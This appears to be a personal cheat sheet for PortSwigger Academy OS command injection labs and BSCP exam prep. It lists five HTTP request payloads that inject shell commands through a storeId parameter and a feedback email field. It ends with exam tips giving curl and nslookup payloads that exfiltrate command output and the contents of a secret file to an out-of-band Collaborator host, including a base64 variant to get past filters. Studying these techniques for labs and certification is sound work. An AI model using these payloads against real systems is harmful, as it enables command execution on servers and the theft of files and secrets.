##### OS command injection via stock checker – reflected command output
```http
GET /product/stock?productId=1&storeId=1|whoami HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
Context: The `storeId` parameter is concatenated into a shell command (`stockchecker.sh <productId> <storeId>`). By injecting a pipe (`|`) operator, the shell executes `whoami` and returns its output in the HTTP response.
Encoding: None
Source: [[1. OS command injection, simple case]]
---
##### Blind OS command injection with time delays – blind detection via ping delay
```http
POST /feedback HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
email=x||ping+-c+10+127.0.0.1||
```
Context: Blind OS command injection in the feedback function—output isn't returned, but injecting `ping -c 10` causes a 10-second response delay, confirming execution.
Encoding: Spaces encoded as `+`
Source: [[2. Blind OS command injection with time delays]]
---
##### Blind OS command injection with output redirection – exfiltrate command output via web-accessible file
```http
POST /feedback HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
email=||whoami>/var/www/images/output.txt||
```
Context: Blind OS command injection in the feedback feature—output isn’t returned directly, but redirecting `whoami` into `/var/www/images/output.txt` writes it to a web-accessible folder.
Encoding: None
Source: [[3. Blind OS command injection with output redirection]]
----
##### Blind OS command injection with out-of-band interaction – DNS lookup via Burp Collaborator
```http
POST /feedback HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
```
Context: The feedback function executes the injected command asynchronously with no direct output. By issuing an `nslookup` to your Burp Collaborator subdomain, you trigger an out-of-band DNS interaction that confirms code execution.
Encoding: None
Source: [[4. Blind OS command injection with out-of-band interaction]]
---
##### Blind OS command injection with out-of-band data exfiltration – DNS lookup of `whoami`
```http
POST /feedback HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
```
Context: The feedback endpoint executes injected commands asynchronously without returning output. By issuing an `nslookup` to your Burp Collaborator subdomain and wrapping `whoami` in backticks, the OS user is exfiltrated via DNS.
Encoding: None
Source: [[5. Blind OS command injection with out-of-band data exfiltration]]
---
---
### **OS Command Injection Hint for BSCP:**
On the **Submit Feedback** page, the **email field** is a hot candidate — but don't assume DNS callback alone is enough. If you're only seeing your payload work like
```
email=||curl+burp.oastify.com?c=`whoami`||
```
during the lab, know this: **that’s not enough for the exam**.
Instead, **exploit DNS-based exfiltration** to leak actual content:
**Use payloads like:**
```bash
|| nslookup `cat /home/carlos/secret`.burp.oastify.com ||
```
Or if that's filtered, try hex obfuscation or base64 wrapping:
```bash
|| nslookup $(base64 /home/carlos/secret | tr -d '\n').burp.oastify.com ||
```
⚠️ **Why this matters:** The exam will expect **proof of exfiltrating file contents** (e.g., `/home/carlos/secret`) via DNS, **not just a DNS ping**. Your Collaborator log should show subdomains containing the actual secret.
📌 **Pro Tip:** Don’t just stop at the email field. Always test **all user-controllable fields** with OSI payloads — parameters like `subject`, `message`, or even hidden inputs can sometimes be sink points.